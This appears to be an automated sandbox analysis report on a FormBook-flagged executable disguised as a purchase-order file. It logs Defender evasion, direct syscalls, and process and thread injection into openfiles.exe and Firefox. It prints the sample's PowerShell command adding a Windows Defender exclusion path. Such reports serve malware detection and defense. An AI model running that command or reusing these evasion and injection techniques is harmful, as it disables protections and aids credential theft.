            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165EBFC mov eax, dword ptr fs:[00000030h]6_2_0165EBFC
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016BCBF0 mov eax, dword ptr fs:[00000030h]6_2_016BCBF0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01650BCB mov eax, dword ptr fs:[00000030h]6_2_01650BCB
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01650BCB mov eax, dword ptr fs:[00000030h]6_2_01650BCB
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01650BCB mov eax, dword ptr fs:[00000030h]6_2_01650BCB
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01630BCD mov eax, dword ptr fs:[00000030h]6_2_01630BCD
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01630BCD mov eax, dword ptr fs:[00000030h]6_2_01630BCD
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01630BCD mov eax, dword ptr fs:[00000030h]6_2_01630BCD
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016DEBD0 mov eax, dword ptr fs:[00000030h]6_2_016DEBD0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01640BBE mov eax, dword ptr fs:[00000030h]6_2_01640BBE
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01640BBE mov eax, dword ptr fs:[00000030h]6_2_01640BBE
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016E4BB0 mov eax, dword ptr fs:[00000030h]6_2_016E4BB0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016E4BB0 mov eax, dword ptr fs:[00000030h]6_2_016E4BB0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166CA6F mov eax, dword ptr fs:[00000030h]6_2_0166CA6F
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166CA6F mov eax, dword ptr fs:[00000030h]6_2_0166CA6F
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166CA6F mov eax, dword ptr fs:[00000030h]6_2_0166CA6F
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016DEA60 mov eax, dword ptr fs:[00000030h]6_2_016DEA60
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016ACA72 mov eax, dword ptr fs:[00000030h]6_2_016ACA72
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016ACA72 mov eax, dword ptr fs:[00000030h]6_2_016ACA72
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01636A50 mov eax, dword ptr fs:[00000030h]6_2_01636A50
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01636A50 mov eax, dword ptr fs:[00000030h]6_2_01636A50
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01636A50 mov eax, dword ptr fs:[00000030h]6_2_01636A50
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01636A50 mov eax, dword ptr fs:[00000030h]6_2_01636A50
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01636A50 mov eax, dword ptr fs:[00000030h]6_2_01636A50
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01636A50 mov eax, dword ptr fs:[00000030h]6_2_01636A50
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01636A50 mov eax, dword ptr fs:[00000030h]6_2_01636A50
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01640A5B mov eax, dword ptr fs:[00000030h]6_2_01640A5B
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01640A5B mov eax, dword ptr fs:[00000030h]6_2_01640A5B
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166CA24 mov eax, dword ptr fs:[00000030h]6_2_0166CA24
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0165EA2E mov eax, dword ptr fs:[00000030h]6_2_0165EA2E
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01654A35 mov eax, dword ptr fs:[00000030h]6_2_01654A35
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01654A35 mov eax, dword ptr fs:[00000030h]6_2_01654A35
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166CA38 mov eax, dword ptr fs:[00000030h]6_2_0166CA38
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_016BCA11 mov eax, dword ptr fs:[00000030h]6_2_016BCA11
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166AAEE mov eax, dword ptr fs:[00000030h]6_2_0166AAEE
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_0166AAEE mov eax, dword ptr fs:[00000030h]6_2_0166AAEE
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01686ACC mov eax, dword ptr fs:[00000030h]6_2_01686ACC
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01686ACC mov eax, dword ptr fs:[00000030h]6_2_01686ACC
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01686ACC mov eax, dword ptr fs:[00000030h]6_2_01686ACC
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01630AD0 mov eax, dword ptr fs:[00000030h]6_2_01630AD0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01664AD0 mov eax, dword ptr fs:[00000030h]6_2_01664AD0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01664AD0 mov eax, dword ptr fs:[00000030h]6_2_01664AD0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01638AA0 mov eax, dword ptr fs:[00000030h]6_2_01638AA0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01638AA0 mov eax, dword ptr fs:[00000030h]6_2_01638AA0
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeCode function: 6_2_01686AA4 mov eax, dword ptr fs:[00000030h]6_2_01686AA4
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO Copy_7854569.exe"
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO Copy_7854569.exe"Jump to behavior
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeNtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeMemory written: C:\Users\user\Desktop\PO Copy_7854569.exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeSection loaded: NULL target: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeSection loaded: NULL target: C:\Windows\SysWOW64\openfiles.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: NULL target: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: NULL target: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\openfiles.exeThread register set: target process: 5756Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\openfiles.exeThread APC queued: target process: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO Copy_7854569.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess created: C:\Users\user\Desktop\PO Copy_7854569.exe "C:\Users\user\Desktop\PO Copy_7854569.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeProcess created: C:\Users\user\Desktop\PO Copy_7854569.exe "C:\Users\user\Desktop\PO Copy_7854569.exe"Jump to behavior
            Source: C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exeProcess created: C:\Windows\SysWOW64\openfiles.exe "C:\Windows\SysWOW64\openfiles.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\openfiles.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 00000007.00000002.4440013475.0000000000D11000.00000002.00000001.00040000.00000000.sdmp, sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 00000007.00000000.2040563342.0000000000D11000.00000002.00000001.00040000.00000000.sdmp, sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 0000000A.00000000.2206107371.0000000001761000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 00000007.00000002.4440013475.0000000000D11000.00000002.00000001.00040000.00000000.sdmp, sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 00000007.00000000.2040563342.0000000000D11000.00000002.00000001.00040000.00000000.sdmp, sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 0000000A.00000000.2206107371.0000000001761000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 00000007.00000002.4440013475.0000000000D11000.00000002.00000001.00040000.00000000.sdmp, sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 00000007.00000000.2040563342.0000000000D11000.00000002.00000001.00040000.00000000.sdmp, sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 0000000A.00000000.2206107371.0000000001761000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 00000007.00000002.4440013475.0000000000D11000.00000002.00000001.00040000.00000000.sdmp, sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 00000007.00000000.2040563342.0000000000D11000.00000002.00000001.00040000.00000000.sdmp, sXAKgqpSAiGEzhyDsUSKBxPWz.exe, 0000000A.00000000.2206107371.0000000001761000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeQueries volume information: C:\Users\user\Desktop\PO Copy_7854569.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PO Copy_7854569.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
